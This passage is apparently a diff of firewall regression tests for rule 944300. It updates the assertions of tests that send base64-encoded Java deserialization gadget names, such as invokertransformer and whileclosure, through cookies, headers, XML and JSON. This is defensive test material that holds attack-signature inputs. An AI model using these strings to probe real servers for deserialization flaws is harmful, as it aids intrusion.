test_id: 224 desc: "Cookie name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: @@ -4321,7 +4544,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 225 desc: "Request header test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: @@ -4341,7 +4565,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 226 desc: "XML attribute value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: 
@@ -4360,7 +4585,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 227 desc: "XML element value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: @@ -4379,7 +4605,8 @@ tests: version: "HTTP/1.0" data: "BpbnZva2VydHJhbnNmb3JtZXI" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 228 desc: "Nested XML element value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: @@ -4398,7 +4625,8 @@ tests: version: "HTTP/1.0" data: "BpbnZva2VydHJhbnNmb3JtZXI" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 229 desc: "Content-Type text/plain includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: @@ -4417,7 +4645,8 @@ tests: version: "HTTP/1.0" data: "test=BpbnZva2VydHJhbnNmb3JtZXI" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 230 desc: "Content-Type application/json arg value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: @@ -4436,7 +4665,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"BpbnZva2VydHJhbnNmb3JtZXI\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 231 desc: "Content-Type application/json arg name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: @@ -4455,7 +4685,8 @@ tests: version: "HTTP/1.0" data: "{\"BpbnZva2VydHJhbnNmb3JtZXI\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 232 desc: "Argument test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: @@ -4474,7 +4705,8 @@ tests: version: "HTTP/1.0" data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 233 desc: "Argument name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: 
@@ -4493,7 +4725,8 @@ tests: version: "HTTP/1.0" data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 234 desc: "Cookie test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: @@ -4513,7 +4746,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 235 desc: "Cookie name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: @@ -4533,7 +4767,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 236 desc: "Request header test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: @@ -4553,7 +4788,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 237 desc: "XML attribute value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: @@ -4572,7 +4808,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 238 desc: "XML element value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: @@ -4591,7 +4828,8 @@ tests: version: "HTTP/1.0" data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 239 desc: "Nested XML element value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: @@ -4610,7 +4848,8 @@ tests: version: "HTTP/1.0" data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 240 desc: "Content-Type text/plain includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: @@ -4629,7 +4868,8 @@ tests: version: "HTTP/1.0" data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 241 desc: "Content-Type application/json arg value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: 
@@ -4648,7 +4888,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"cHJvdG90eXBlY2xvbmVmYWN0b3J5\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 242 desc: "Content-Type application/json arg name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: @@ -4667,7 +4908,8 @@ tests: version: "HTTP/1.0" data: "{\"cHJvdG90eXBlY2xvbmVmYWN0b3J5\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 243 desc: "Argument test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: @@ -4686,7 +4928,8 @@ tests: version: "HTTP/1.0" data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 244 desc: "Argument name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: @@ -4705,7 +4948,8 @@ tests: version: "HTTP/1.0" data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 245 desc: "Cookie test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: @@ -4725,7 +4969,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 246 desc: "Cookie name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: @@ -4745,7 +4990,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 247 desc: "Request header test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: @@ -4765,7 +5011,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 248 desc: "XML attribute value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: @@ -4784,7 +5031,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 249 desc: "XML element value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: 
@@ -4803,7 +5051,8 @@ tests: version: "HTTP/1.0" data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 250 desc: "Nested XML element value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: @@ -4822,7 +5071,8 @@ tests: version: "HTTP/1.0" data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 251 desc: "Content-Type text/plain includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: @@ -4841,7 +5091,8 @@ tests: version: "HTTP/1.0" data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 252 desc: "Content-Type application/json arg value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: @@ -4860,7 +5111,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 253 desc: "Content-Type application/json arg name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: @@ -4879,7 +5131,8 @@ tests: version: "HTTP/1.0" data: "{\"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 254 desc: "Argument test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: @@ -4898,7 +5151,8 @@ tests: version: "HTTP/1.0" data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 255 desc: "Argument name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: @@ -4917,7 +5171,8 @@ tests: version: "HTTP/1.0" data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 256 desc: "Cookie test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: 
@@ -4937,7 +5192,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 257 desc: "Cookie name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: @@ -4957,7 +5213,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 258 desc: "Request header test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: @@ -4977,7 +5234,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 259 desc: "XML attribute value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: @@ -4996,7 +5254,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 260 desc: "XML element value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: @@ -5015,7 +5274,8 @@ tests: version: "HTTP/1.0" data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 261 desc: "Nested XML element value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: @@ -5034,7 +5294,8 @@ tests: version: "HTTP/1.0" data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 262 desc: "Content-Type text/plain includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: @@ -5053,7 +5314,8 @@ tests: version: "HTTP/1.0" data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 263 desc: "Content-Type application/json arg value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: 
@@ -5072,7 +5334,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 264 desc: "Content-Type application/json arg name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: @@ -5091,7 +5354,8 @@ tests: version: "HTTP/1.0" data: "{\"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 265 desc: "Argument test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: @@ -5110,7 +5374,8 @@ tests: version: "HTTP/1.0" data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 266 desc: "Argument name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: @@ -5129,7 +5394,8 @@ tests: version: "HTTP/1.0" data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 267 desc: "Cookie test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: @@ -5149,7 +5415,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 268 desc: "Cookie name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: @@ -5169,7 +5436,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 269 desc: "Request header test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: @@ -5189,7 +5457,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 270 desc: "XML attribute value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: 
@@ -5208,7 +5477,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 271 desc: "XML element value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: @@ -5227,7 +5497,8 @@ tests: version: "HTTP/1.0" data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 272 desc: "Nested XML element value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: @@ -5246,7 +5517,8 @@ tests: version: "HTTP/1.0" data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 273 desc: "Content-Type text/plain includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: @@ -5265,7 +5537,8 @@ tests: version: "HTTP/1.0" data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 274 desc: "Content-Type application/json arg value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: @@ -5284,7 +5557,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 275 desc: "Content-Type application/json arg name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: @@ -5303,7 +5577,8 @@ tests: version: "HTTP/1.0" data: "{\"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 276 desc: "Argument test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: @@ -5322,7 +5597,8 @@ tests: version: "HTTP/1.0" data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 277 desc: "Argument name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: 
@@ -5341,7 +5617,8 @@ tests: version: "HTTP/1.0" data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 278 desc: "Cookie test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: @@ -5361,7 +5638,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 279 desc: "Cookie name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: @@ -5381,7 +5659,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 280 desc: "Request header test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: @@ -5401,7 +5680,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 281 desc: "XML attribute value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: @@ -5420,7 +5700,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 282 desc: "XML element value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: @@ -5439,7 +5720,8 @@ tests: version: "HTTP/1.0" data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 283 desc: "Nested XML element value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: @@ -5458,7 +5740,8 @@ tests: version: "HTTP/1.0" data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 284 desc: "Content-Type text/plain includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: 
@@ -5477,7 +5760,8 @@ tests: version: "HTTP/1.0" data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 285 desc: "Content-Type application/json arg value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: @@ -5496,7 +5780,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 286 desc: "Content-Type application/json arg name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: @@ -5515,7 +5800,8 @@ tests: version: "HTTP/1.0" data: "{\"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 287 desc: "Argument test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: @@ -5534,7 +5820,8 @@ tests: version: "HTTP/1.0" data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 288 desc: "Argument name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: @@ -5553,7 +5840,8 @@ tests: version: "HTTP/1.0" data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 289 desc: "Cookie test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: @@ -5573,7 +5861,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 290 desc: "Cookie name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: @@ -5593,7 +5882,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 291 desc: "Request header test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: 
@@ -5613,7 +5903,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 292 desc: "XML attribute value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: @@ -5632,7 +5923,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 293 desc: "XML element value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: @@ -5651,7 +5943,8 @@ tests: version: "HTTP/1.0" data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 294 desc: "Nested XML element value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: @@ -5670,7 +5963,8 @@ tests: version: "HTTP/1.0" data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 295 desc: "Content-Type text/plain includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: @@ -5689,7 +5983,8 @@ tests: version: "HTTP/1.0" data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 296 desc: "Content-Type application/json arg value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: @@ -5708,7 +6003,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 297 desc: "Content-Type application/json arg name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: @@ -5727,7 +6023,8 @@ tests: version: "HTTP/1.0" data: "{\"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 298 desc: "Argument test includes keyword d2hpbGVjbG9zdXJl" stages: 
@@ -5746,7 +6043,8 @@ tests: version: "HTTP/1.0" data: "test=d2hpbGVjbG9zdXJl" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 299 desc: "Argument name includes keyword d2hpbGVjbG9zdXJl" stages: @@ -5765,7 +6063,8 @@ tests: version: "HTTP/1.0" data: "d2hpbGVjbG9zdXJl=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 300 desc: "Cookie test includes keyword d2hpbGVjbG9zdXJl" stages: @@ -5785,7 +6084,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 301 desc: "Cookie name includes keyword d2hpbGVjbG9zdXJl" stages: @@ -5805,7 +6105,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 302 desc: "Request header test includes keyword d2hpbGVjbG9zdXJl" stages: @@ -5825,7 +6126,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 303 desc: "XML attribute value includes keyword d2hpbGVjbG9zdXJl" stages: @@ -5844,7 +6146,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 304 desc: "XML element value includes keyword d2hpbGVjbG9zdXJl" stages: @@ -5863,7 +6166,8 @@ tests: version: "HTTP/1.0" data: "d2hpbGVjbG9zdXJl" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 305 desc: "Nested XML element value includes keyword d2hpbGVjbG9zdXJl" stages: @@ -5882,7 +6186,8 @@ tests: version: "HTTP/1.0" data: "d2hpbGVjbG9zdXJl" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 306 desc: "Content-Type text/plain includes keyword d2hpbGVjbG9zdXJl" stages: 
@@ -5901,7 +6206,8 @@ tests: version: "HTTP/1.0" data: "test=d2hpbGVjbG9zdXJl" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 307 desc: "Content-Type application/json arg value includes keyword d2hpbGVjbG9zdXJl" stages: @@ -5920,7 +6226,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"d2hpbGVjbG9zdXJl\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 308 desc: "Content-Type application/json arg name includes keyword d2hpbGVjbG9zdXJl" stages: @@ -5939,7 +6246,8 @@ tests: version: "HTTP/1.0" data: "{\"d2hpbGVjbG9zdXJl\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 309 desc: "Argument test includes keyword HdoaWxlY2xvc3VyZQ" stages: @@ -5958,7 +6266,8 @@ tests: version: "HTTP/1.0" data: "test=HdoaWxlY2xvc3VyZQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 310 desc: "Argument name includes keyword HdoaWxlY2xvc3VyZQ" stages: @@ -5977,7 +6286,8 @@ tests: version: "HTTP/1.0" data: "HdoaWxlY2xvc3VyZQ=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 311 desc: "Cookie test includes keyword HdoaWxlY2xvc3VyZQ" stages: @@ -5997,7 +6307,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 312 desc: "Cookie name includes keyword HdoaWxlY2xvc3VyZQ" stages: @@ -6017,7 +6328,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 313 desc: "Request header test includes keyword HdoaWxlY2xvc3VyZQ" stages: @@ -6037,7 +6349,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 314 desc: "XML attribute value includes keyword HdoaWxlY2xvc3VyZQ" stages: 
@@ -6056,7 +6369,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 315 desc: "XML element value includes keyword HdoaWxlY2xvc3VyZQ" stages: @@ -6075,7 +6389,8 @@ tests: version: "HTTP/1.0" data: "HdoaWxlY2xvc3VyZQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 316 desc: "Nested XML element value includes keyword HdoaWxlY2xvc3VyZQ" stages: @@ -6094,7 +6409,8 @@ tests: version: "HTTP/1.0" data: "HdoaWxlY2xvc3VyZQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 317 desc: "Content-Type text/plain includes keyword HdoaWxlY2xvc3VyZQ" stages: @@ -6113,7 +6429,8 @@ tests: version: "HTTP/1.0" data: "test=HdoaWxlY2xvc3VyZQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 318 desc: "Content-Type application/json arg value includes keyword HdoaWxlY2xvc3VyZQ" stages: @@ -6132,7 +6449,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"HdoaWxlY2xvc3VyZQ\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 319 desc: "Content-Type application/json arg name includes keyword HdoaWxlY2xvc3VyZQ" stages: @@ -6151,7 +6469,8 @@ tests: version: "HTTP/1.0" data: "{\"HdoaWxlY2xvc3VyZQ\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 320 desc: "Argument test includes keyword B3aGlsZWNsb3N1cmU" stages: @@ -6170,7 +6489,8 @@ tests: version: "HTTP/1.0" data: "test=B3aGlsZWNsb3N1cmU" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 321 desc: "Argument name includes keyword B3aGlsZWNsb3N1cmU" stages: @@ -6189,7 +6509,8 @@ tests: version: "HTTP/1.0" data: "B3aGlsZWNsb3N1cmU=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 322 desc: "Cookie test includes keyword B3aGlsZWNsb3N1cmU" stages: 
@@ -6209,7 +6530,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 323 desc: "Cookie name includes keyword B3aGlsZWNsb3N1cmU" stages: @@ -6229,7 +6551,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 324 desc: "Request header test includes keyword B3aGlsZWNsb3N1cmU" stages: @@ -6249,7 +6572,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 325 desc: "XML attribute value includes keyword B3aGlsZWNsb3N1cmU" stages: @@ -6268,7 +6592,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 326 desc: "XML element value includes keyword B3aGlsZWNsb3N1cmU" stages: @@ -6287,7 +6612,8 @@ tests: version: "HTTP/1.0" data: "B3aGlsZWNsb3N1cmU" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 327 desc: "Nested XML element value includes keyword B3aGlsZWNsb3N1cmU" stages: @@ -6306,7 +6632,8 @@ tests: version: "HTTP/1.0" data: "B3aGlsZWNsb3N1cmU" output: - 